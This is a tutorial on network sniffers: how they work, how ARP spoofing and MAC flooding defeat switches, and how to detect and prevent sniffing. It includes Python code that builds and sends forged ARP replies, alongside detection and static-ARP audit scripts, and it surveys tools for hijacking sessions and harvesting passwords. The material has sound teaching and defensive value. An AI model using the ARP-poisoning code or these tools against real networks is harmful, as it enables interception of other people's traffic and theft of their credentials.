Sniffer technique
Preface
This is the first version of my article titled "Sniffers Basics and Detection". In it I have tried to explain, in a very simple way, what sniffers are, how they work, methods of detecting sniffers, various sniffing tools and finally how to protect against sniffers. The reason I wrote this document was that when I started trying out sniffers, there was not a single document that covered this topic comprehensively.
Introduction
A sniffer is a program or a device that eavesdrops on network traffic by capturing the frames travelling over a network; sniffers are basically "data interception" technology. They work because Ethernet was built around a principle of sharing: on a shared segment, frames addressed to one computer physically reach every other computer on that segment. In normal operation every computer except the intended recipient silently ignores such frames. A network card can, however, be told to accept frames that are not addressed to it, and that is exactly what a sniffer does. Many people assume computers connected to a switch are safe from sniffing. Nothing could be further from the truth: a switch makes passive sniffing harder, but with the active techniques described below, computers on a switched segment can be sniffed as well. This article seeks to explore the topic of sniffers, how they work, detecting them and protecting your assets against the malicious use of these programs. Finally, towards the end we will talk about some commonly available sniffers.
How a Sniffer Works
A computer connected to a LAN has two addresses. One is the MAC (Media Access Control) address, which uniquely identifies each node on the network and is stored on the network card itself. It is the MAC address that the Ethernet protocol uses when building the "frames" that carry data to and from a machine. The other is the IP address, which is what applications and routing work with. The Data Link Layer puts the MAC address of the destination machine, not its IP address, in the Ethernet header. Mapping an IP address to the MAC address the Data Link protocol needs is the job of ARP (Address Resolution Protocol). The sender first looks the destination IP address up in a local table, the ARP cache. If no entry is found, it broadcasts an ARP request to every machine on the segment, asking who holds that IP address. The machine with that address replies with its MAC address, the reply is added to the sender's ARP cache, and from then on the sender uses that MAC address for all its frames to the destination until the cache entry expires.
1) In common industry usage, a sniffer (with lower case "s") is a program that monitors and analyzes network traffic, detecting bottlenecks and problems. Using this information, a network manager can keep traffic flowing efficiently.
A sniffer can also be used legitimately or illegitimately to capture data being transmitted on a network. A network router reads every packet of data passed to it, determining whether it is intended for a destination within the router's own network or whether it should be passed further along the Internet. A router with a sniffer, however, may be able to read the data in the packet as well as the source and destination addresses. Sniffers are often used on academic networks to prevent traffic bottlenecks caused by file-sharing applications.
The term "sniffer" is occasionally used for a program that analyzes data other than network traffic. For example, a database could be analyzed for certain kinds of duplication.
2) Sniffer (with a capital "S") is a trademark owned by NetScout. The generic term may have originated from Sniffer, which is said to be the first packet capture and decode software that was offered for the purpose of network analysis and troubleshooting.
There are two basic types of Ethernet environments and how sniffers work in both these cases is slightly different.
• Shared Ethernet:
In a shared Ethernet environment, all hosts are connected to the same bus and compete with one another for bandwidth. In such an environment, frames meant for one machine are received by all the other machines. Thus when a machine Venus (Comp 1) wants to talk to Cupid (Comp 2), it sends a frame on the network with the destination MAC address of Cupid along with its own source MAC address. All the other computers on the shared Ethernet (Comp 3 and Comp 4) compare the frame's destination MAC address with their own. If the two don't match, the frame is quietly discarded. A machine running a sniffer breaks this rule and accepts all frames. Such a machine is said to have been put into promiscuous mode and can effectively listen to all the traffic on the segment. Sniffing in a shared Ethernet environment is totally passive and hence extremely difficult to detect.
• Switched Ethernet:
An Ethernet environment in which the hosts are connected to a switch instead of a hub is called a switched Ethernet. The switch maintains a table that records each computer's MAC address and the physical port on the switch to which that MAC address is connected, and it forwards a frame only out of the port where the destination MAC address was learned. The switch is thus an intelligent device that sends frames to the destined computer only and does not repeat them to all the machines on the network, as the hub did. This results in better utilization of the available bandwidth and improved security. Hence the process followed earlier, putting the machine into promiscuous mode to gather frames, does not work on its own: the sniffing machine's port only ever sees traffic addressed to it, plus broadcasts. As a result, even many experienced systems administrators fall into the belief that switched networks are totally secure and immune to sniffing. Sadly, this is not really true.
Though a switch is more secure than a hub, the following methods can still be used to sniff on a switch:
1. ARP Spoofing: We explained earlier how ARP is used to obtain the MAC address of the destination machine with which we wish to communicate. ARP is stateless: you can send an ARP reply even when nobody asked for one, and most hosts will accept it and update their cache. So when you want to sniff the traffic originating from machine Venus, you ARP-spoof the gateway of the network: you keep sending Venus ARP replies that map the gateway's IP address to your own MAC address. Venus's ARP cache now holds a wrong entry for the gateway and is said to be poisoned, and all the traffic Venus sends to the gateway will pass through your machine (which must forward it on, or Venus loses connectivity and you lose your cover). Another trick is to poison a host's ARP cache by setting the gateway's MAC address to FF:FF:FF:FF:FF:FF (the broadcast MAC); the switch then floods the host's gateway-bound frames out of every port, where any machine can sniff them. An excellent tool for this is the arpspoof utility that comes with the dsniff suite, which keeps sending the forged replies to a chosen target for you.
2. MAC Flooding: Switches keep a translation table that maps MAC addresses to the physical ports on the switch, which is what lets them deliver a frame only to the port its destination sits on. The switch has a limited amount of memory for this table. MAC flooding exploits this limitation by bombarding the switch with frames from thousands of fake source MAC addresses until the table is full and the switch can't keep up. Many switches then enter what is known as "fail-open mode", in which they behave like a hub and flood frames to every port, and sniffing becomes as easy as on a shared segment. MAC flooding can be performed with macof, a utility that comes with the dsniff suite. Note that switches which limit the number of MAC addresses learned per port (often called port security) shut the port down or refuse new addresses instead of failing open, so this does not work everywhere.
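To make the ARP resolution and spoofing discussion above concrete, here is an added example (my own code, not code from the article or from the dsniff suite). It builds the raw Ethernet/ARP frame that arpspoof sends, an ARP reply nobody asked for, parses it back, and shows what such a reply does to a victim cache that accepts unsolicited replies, including the broadcast-MAC variant. The hosts, addresses and interface name are made up. Real stacks differ in detail (Linux, for example, updates an existing entry from an unsolicited reply but does not create a new one unless arp_accept is set), so the cache model here is the simplified behaviour the text describes.

```python
"""Raw Ethernet/ARP frames and a model of ARP cache poisoning.

Added example, not code from the article or from dsniff. Stdlib only.
Addresses below are a constructed lab network (assumed).
"""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"

GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "00:0c:29:11:11:11"
VENUS_IP, VENUS_MAC = "192.168.1.10", "00:0c:29:22:22:22"
ATTACKER_MAC = "00:0c:29:66:66:66"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, eth_dst=None, eth_src=None):
    """Ethernet II header + 28-byte ARP payload (IPv4 over Ethernet).
    The Ethernet addresses default to the ARP addresses but can be set
    independently, which is what makes the broadcast-MAC trick possible."""
    eth = mac_bytes(eth_dst or target_mac) + mac_bytes(eth_src or sender_mac)
    eth += struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode a frame built by build_arp (or read off the wire)."""
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not IPv4-over-Ethernet ARP")
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {
        "eth_dst": mac_str(eth_dst), "eth_src": mac_str(eth_src), "op": op,
        "sender_mac": mac_str(sha), "sender_ip": ip_str(spa),
        "target_mac": mac_str(tha), "target_ip": ip_str(tpa),
    }


class ArpCache:
    """The stateless behaviour the article describes: whatever ARP frame
    arrives, the sender's IP->MAC pair is stored, asked for or not."""

    def __init__(self):
        self.table = {}

    def process(self, frame):
        a = parse_arp(frame)
        self.table[a["sender_ip"]] = a["sender_mac"]
        return a


def poison_demo():
    """Venus's cache after the real gateway answers, after an arpspoof-style
    forged reply, and after the broadcast-MAC variant of the same trick."""
    venus = ArpCache()
    # Legitimate reply to Venus's (not shown) broadcast request for the gateway.
    venus.process(build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VENUS_MAC, VENUS_IP))
    before = dict(venus.table)
    # What `arpspoof -t 192.168.1.10 192.168.1.1` keeps sending: a reply
    # claiming the gateway's IP with the attacker's MAC.
    venus.process(build_arp(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VENUS_MAC, VENUS_IP))
    poisoned = dict(venus.table)
    # Variant: gateway IP mapped to the broadcast MAC, so the switch floods
    # Venus's gateway-bound frames out of every port. Ethernet source stays
    # the attacker's own MAC; only the ARP sender field is forged.
    venus.process(build_arp(ARP_REPLY, BROADCAST, GATEWAY_IP, VENUS_MAC, VENUS_IP,
                            eth_src=ATTACKER_MAC))
    flooded = dict(venus.table)
    return before, poisoned, flooded


def send_frame(iface, frame):
    """Put a frame on the wire (Linux only, needs CAP_NET_RAW; not run here)."""
    import socket
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


if __name__ == "__main__":
    for label, table in zip(("before", "poisoned", "flooded"), poison_demo()):
        print(label, table)
```

Running it prints the gateway entry changing from the gateway's MAC to the attacker's and then to the broadcast address. To actually send, bind a raw socket to the interface with send_frame; note that an attacker who does not also enable IP forwarding cuts the victim off, which is one of the things that gives ARP spoofing away.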
Detecting Sniffers
A sniffer is usually passive; it just collects data. Hence it becomes extremely difficult to detect sniffers, especially on a shared Ethernet. It is slightly easier when the sniffer is working on a switched Ethernet segment, because there it has to send ARP or flood traffic to get anything at all. Even a sniffer installed on a compromised host leaves some small traces, in traffic or in the host's behaviour, and the detection methods below build on those:
• Ping Method: Send an ICMP echo request to the IP address of the suspect machine but with a destination MAC address that is not the suspect's. Normally no host should process this frame, since every Ethernet adapter rejects frames whose destination MAC does not match its own. But if the suspect machine's card is in promiscuous mode, the frame is passed up the stack, the IP layer sees its own address and it replies. This is an old method and not reliable any longer, because modern stacks also check the destination MAC in software and drop frames that were not for them.
• ARP Method: Machines cache the ARP traffic they see. So we send an ARP request for our own address whose Ethernet destination is not the broadcast address; only a card in promiscuous mode passes it to the kernel, and such a machine will cache our IP/MAC pair from it. Next we send a broadcast ping from our IP address but with a different source MAC address. Only a machine that already has our correct MAC address, from the sniffed ARP frame, will be able to answer us. Voila!
• On Local Host: Often, after your machine has been compromised, hackers will leave sniffers behind to compromise other machines. On the local machine run ifconfig. On a clean machine the output shows the usual interface flags (UP, BROADCAST, RUNNING, MULTICAST); an interface that has been put into promiscuous mode also shows PROMISC. Bear in mind that a rootkit may replace ifconfig to hide this flag, so a known-good binary, or the kernel's own view via ip link, is worth checking as well.
• Latency Method: This method is based on the assumption that most sniffers do some parsing. Very simply put, a huge amount of data is sent on the network and the suspect machine is pinged before and during the flood. If the machine is in promiscuous mode it will parse all that data, increasing its load, so it will take extra time to respond to the ping. This difference in response times can be used as an indicator of whether a machine is in promiscuous mode or not. A point worth noting is that the packets may also be delayed simply because of the load on the wire, resulting in false positives.
• ARP Watch: As described earlier, one method to sniff on a switched network is to ARP-spoof the gateway. A utility called arpwatch keeps its own database of the IP/MAC pairings it sees on the wire and reports when a pairing changes (a "changed ethernet address" or "flip flop" report), which is exactly what a poisoned gateway entry looks like from the outside; such reports can trigger alarms and lead to detection of sniffers. Unfortunately on a network using DHCP this can cause many false alarms, because addresses legitimately move between machines. A simple change is to increase the DHCP lease time: that way, even after your users come back from the weekend break they get the same IP address as before, and the chance of a false alarm is greatly reduced.
• Using IDS: Certain Intrusion Detection Systems monitor for ARP spoofing on the network. The open source IDS Snort, for instance, has an arpspoof preprocessor that lets it record packets with spoofed ARP addresses. It compares the IP/MAC pairings it is given in snort.conf against the pairing in each ARP packet flowing across the network and generates an alert whenever there is a mismatch; it also alerts on unicast ARP requests and on frames whose Ethernet source address disagrees with the ARP sender address.
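The ARP Watch and IDS methods above boil down to a few checks on every ARP frame seen on the wire. The following is an added example of those checks in one place (my own code, not the article's and not arpwatch's or Snort's): it remembers IP/MAC pairings and reports changes the way arpwatch does, compares them against a configured list the way the Snort arpspoof preprocessor does, and adds two sanity checks on the frame itself, a non-broadcast ARP request (the probe used in the ARP Method) and a sender MAC that is a broadcast or multicast address (the FF:FF:FF:FF:FF:FF trick). The frames it is run over are constructed records, not captures, and the addresses are assumed.

```python
"""ARP-spoof detection over observed ARP traffic.

Added example, not from the article, arpwatch or Snort. The records and
addresses below are constructed (assumed), not real captures.
"""
from collections import namedtuple

ArpRecord = namedtuple(
    "ArpRecord", "eth_src eth_dst op sender_mac sender_ip target_mac target_ip")
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"

GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "00:0c:29:11:11:11"
VENUS_IP, VENUS_MAC = "192.168.1.10", "00:0c:29:22:22:22"
ADMIN_IP, ADMIN_MAC = "192.168.1.20", "00:0c:29:33:33:33"
ATTACKER_MAC = "00:0c:29:66:66:66"


def is_group_mac(mac):
    """Broadcast/multicast addresses have the low bit of the first octet set;
    no real host answers ARP with one of those as its own address."""
    return int(mac.split(":")[0], 16) & 1 == 1


class ArpMonitor:
    def __init__(self, trusted=None):
        # Configured IP -> MAC pairings, like arpspoof_detect_host in snort.conf.
        self.trusted = dict(trusted or {})
        # Learned IP -> MAC pairings, like arpwatch's database.
        self.seen = {}
        self.alerts = []

    def observe(self, r):
        """Check one ARP frame; return the alerts it raised (also kept in self.alerts)."""
        found = []
        if r.op == ARP_REQUEST and r.eth_dst != BROADCAST:
            found.append(f"unicast ARP request {r.eth_src} -> {r.eth_dst} (promiscuous-mode probe?)")
        if r.eth_src != r.sender_mac:
            found.append(f"Ethernet source {r.eth_src} != ARP sender {r.sender_mac}")
        if is_group_mac(r.sender_mac):
            found.append(f"{r.sender_ip} advertised with group MAC {r.sender_mac}")
        expected = self.trusted.get(r.sender_ip)
        if expected and expected != r.sender_mac:
            found.append(f"{r.sender_ip} claimed by {r.sender_mac}, configured {expected}")
        previous = self.seen.get(r.sender_ip)
        if previous and previous != r.sender_mac:
            found.append(f"changed ethernet address for {r.sender_ip}: {previous} -> {r.sender_mac}")
        self.seen[r.sender_ip] = r.sender_mac
        self.alerts.extend(found)
        return found


# Constructed sequence of ARP frames as a monitor on the segment would see them.
SAMPLE = [
    # Venus resolves the gateway and the gateway answers: both benign.
    ArpRecord(VENUS_MAC, BROADCAST, ARP_REQUEST, VENUS_MAC, VENUS_IP, "00:00:00:00:00:00", GATEWAY_IP),
    ArpRecord(GATEWAY_MAC, VENUS_MAC, ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VENUS_MAC, VENUS_IP),
    # arpspoof-style unsolicited reply: attacker's MAC claiming the gateway IP.
    ArpRecord(ATTACKER_MAC, VENUS_MAC, ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VENUS_MAC, VENUS_IP),
    # Broadcast-MAC variant of the same attack.
    ArpRecord(ATTACKER_MAC, VENUS_MAC, ARP_REPLY, BROADCAST, GATEWAY_IP, VENUS_MAC, VENUS_IP),
    # A non-broadcast ARP request, as used to probe for promiscuous hosts.
    ArpRecord(ADMIN_MAC, VENUS_MAC, ARP_REQUEST, ADMIN_MAC, ADMIN_IP, "00:00:00:00:00:00", VENUS_IP),
]


def run_demo():
    """Feed SAMPLE through a monitor that trusts the gateway's real MAC."""
    mon = ArpMonitor(trusted={GATEWAY_IP: GATEWAY_MAC})
    per_frame = [mon.observe(r) for r in SAMPLE]
    return per_frame, mon.alerts


if __name__ == "__main__":
    for line in run_demo()[1]:
        print(line)
```

The two benign frames raise nothing; the forged reply trips both the configured-pairing check and the arpwatch-style change check, and the broadcast-MAC variant trips four checks at once. On a DHCP network the change check is the noisy one, which is why the article's advice about lease times matters; the configured-pairing check for the gateway alone is quiet and is the one to alert on loudly.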
To be honest, it is not easy to detect sniffers. Often you have to depend on intuition to realize you have a sniffer running. If your network performance suddenly takes a hit, it is possible someone has caused the switch to go into fail-open mode, and if users suddenly claim that their passwords have been changed without their knowledge, you can suspect a sniffer on the network.
Preventing Sniffing
The best way to secure yourself against sniffing is to use encryption: SSH instead of telnet and rlogin, SSL/TLS instead of plain HTTP, POP and IMAP, or a VPN for everything else. This won't prevent a sniffer from capturing your traffic, but it ensures that what the sniffer reads is ciphertext rather than your passwords and data. Be aware that some of the tools listed below can man-in-the-middle SSH and SSL sessions, so users must not blindly accept a changed host key or certificate.
If you are on a switched network, the chances are that ARP spoofing will be used for sniffing purposes, and the machine the malicious user will most probably try to impersonate is the gateway.
To prevent this, you can add the MAC address of the gateway permanently to your ARP cache, so that forged replies no longer overwrite it. This can be done by placing the MAC addresses of your gateway and other important machines in the /etc/ethers file and loading it with arp -f, which creates static entries (they must be reloaded after every reboot). Remember that this protects only your own cache: the attacker can still poison the gateway's entry for your machine, so the reverse direction needs the same treatment, or better, a switch feature such as Dynamic ARP Inspection that validates ARP replies on the switch itself.
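As an added example of the /etc/ethers approach (my own code, not the article's), the block below parses an ethers file, emits the ip neigh commands that would pin those entries, and then audits ip neigh show output for pinned hosts whose cache entry is missing, has the wrong MAC, or is still dynamic and therefore overwritable. Both the ethers file and the ip neigh output are constructed samples with assumed addresses; the gateway entry in the sample has been poisoned, which is what the audit should catch.

```python
"""Pin and audit static ARP entries on a Linux host.

Added example, not from the article. Reads the /etc/ethers format
("MAC host-or-IP" per line, '#' comments) and `ip neigh show` output.
All inputs below are constructed (assumed addresses).
"""

ETHERS_TEXT = """\
# MAC address         IP address or hostname
00:0c:29:11:11:11     192.168.1.1
0:c:29:44:44:44       192.168.1.40
"""

# Constructed `ip neigh show` output: the gateway entry carries the attacker's
# MAC and is dynamic; the file server entry is pinned and correct.
IP_NEIGH_TEXT = """\
192.168.1.1 dev eth0 lladdr 00:0c:29:66:66:66 REACHABLE
192.168.1.40 dev eth0 lladdr 00:0c:29:44:44:44 PERMANENT
192.168.1.77 dev eth0 FAILED
"""


def norm_mac(mac):
    """Canonical lower-case, zero-padded form; ethers(5) allows '0:c:29:...'."""
    parts = mac.lower().split(":")
    ok = len(parts) == 6 and all(
        1 <= len(p) <= 2 and all(c in "0123456789abcdef" for c in p) for p in parts)
    if not ok:
        raise ValueError(f"bad MAC address: {mac}")
    return ":".join(p.zfill(2) for p in parts)


def parse_ethers(text):
    """Return {host_or_ip: mac} from /etc/ethers content."""
    pinned = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        mac, host = line.split()
        pinned[host] = norm_mac(mac)
    return pinned


def parse_ip_neigh(text):
    """Return {ip: {"dev", "lladdr", "state"}} from `ip neigh show` output.
    Entries in FAILED/INCOMPLETE state have no lladdr."""
    entries = {}
    for line in text.splitlines():
        tok = line.split()
        if not tok:
            continue
        ip, rest = tok[0], tok[1:]
        fields = {"dev": None, "lladdr": None, "state": rest[-1] if rest else None}
        for key, val in zip(rest, rest[1:]):
            if key in ("dev", "lladdr"):
                fields[key] = val.lower() if key == "lladdr" else val
        entries[ip] = fields
    return entries


def pin_commands(pinned, dev="eth0"):
    """Commands equivalent to `arp -f /etc/ethers` for the given interface."""
    return [f"ip neigh replace {ip} lladdr {mac} dev {dev} nud permanent"
            for ip, mac in pinned.items()]


def audit(pinned, neigh):
    """Findings for every pinned host whose live entry is not what it should be."""
    findings = []
    for ip, mac in pinned.items():
        e = neigh.get(ip)
        if e is None:
            findings.append(f"{ip}: no ARP entry at all")
            continue
        if e["lladdr"] != mac:
            findings.append(f"{ip}: cache has {e['lladdr']}, /etc/ethers says {mac}")
        if e["state"] != "PERMANENT":
            findings.append(f"{ip}: entry is {e['state']}, not PERMANENT (can be overwritten)")
    return findings


def run_demo():
    pinned = parse_ethers(ETHERS_TEXT)
    return pin_commands(pinned), audit(pinned, parse_ip_neigh(IP_NEIGH_TEXT))


if __name__ == "__main__":
    cmds, findings = run_demo()
    print("\n".join(cmds))
    print("\n".join(findings) or "all pinned entries correct")
```

On a real host, replace the two constants with the contents of /etc/ethers and the output of ip neigh show; a PERMANENT entry with the right MAC is what you want to see for the gateway, and anything else is worth a look.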
Sniffing Tools
Since I have been a Linux man through out, I will list some of the commonly available sniffers for Linux.
• tcpdump: The granddaddy of packet sniffers. Ships by default on many Linux distros! It captures the packets that match a Boolean filter expression and prints their headers. The captured packet data can be saved to a file for later analysis. Available at:
• sniffit: Robust packet sniffer with good filtering. Available at:
• ethereal: A free network protocol analyzer for Unix and Windows (since renamed Wireshark). It allows you to examine data from a live network or from a capture file on disk. Captured data can be browsed via a GUI. Available for both Unix and Windows at:
• hunt: According to Pavel Krauz, the main goal of the HUNT project is to develop a tool for exploiting well known weaknesses in the TCP/IP protocol suite. Well, I think he comes pretty close to it. An added advantage of using hunt is that it allows you to hijack active connections and take over their control. As far as I know, no other sniffer allows you to do that. Available at:
• ettercap: Ettercap is a sniffer specifically designed for switched LANs. It allows you to perform man-in-the-middle attacks against SSH and SSL. It has a password collector for telnet, ftp, POP, rlogin, ssh1, icq, smb, mysql, http, NNTP, X11, napster, IRC, rip, bgp, socks 5, IMAP4, VNC, LDAP, NFS etc. Available at:
http://ettercap.sourceforg
• dsniff: I won't say much about dsniff except point you to an article by Kurt Seifried titled "The End of SSL and SSH". As Mark Joseph Edwards puts it in an article, "Dsniff is the Swiss army knife of privacy invasion". The package ships with a handful of nasties: urlsnarf (to keep track of the websites your network users are visiting), msgsnarf (to keep track of the instant messenger sessions of users on your LAN), mailsnarf (to keep track of the mails that users of your network are receiving), webspy (to follow a user's web surfing in real time), dsniff (to capture user passwords for quite a few protocols), filesnarf (to capture files from NFS traffic), sshmitm (to launch a man-in-the-middle attack against SSH) etc. In my opinion it is one of the most comprehensive sniffer packages available anywhere. It can wreak havoc when used for illegitimate purposes, but it is a valuable tool in the hands of a capable systems administrator. Available at:
• lcrzoex: It is a network toolbox for administrators that supports spoofing, sniffing, client and server creation. Over 400 possible examples are included in the package. This is another incredible package that I feel every systems administrator should try out. It is under active development and the author (Laurent Constantin) is a very friendly and an amazingly helpful person.
Often one or more of these programs need to be used in conjunction to get results. On a switched LAN, for instance, you will first use arpspoof (which comes with dsniff) together with hunt (if you plan to hijack the session) or perhaps with lcrzoex (if you plan to capture the data to a file for later analysis). Ideally, a systems administrator should try all these packages and settle on whatever he is comfortable with.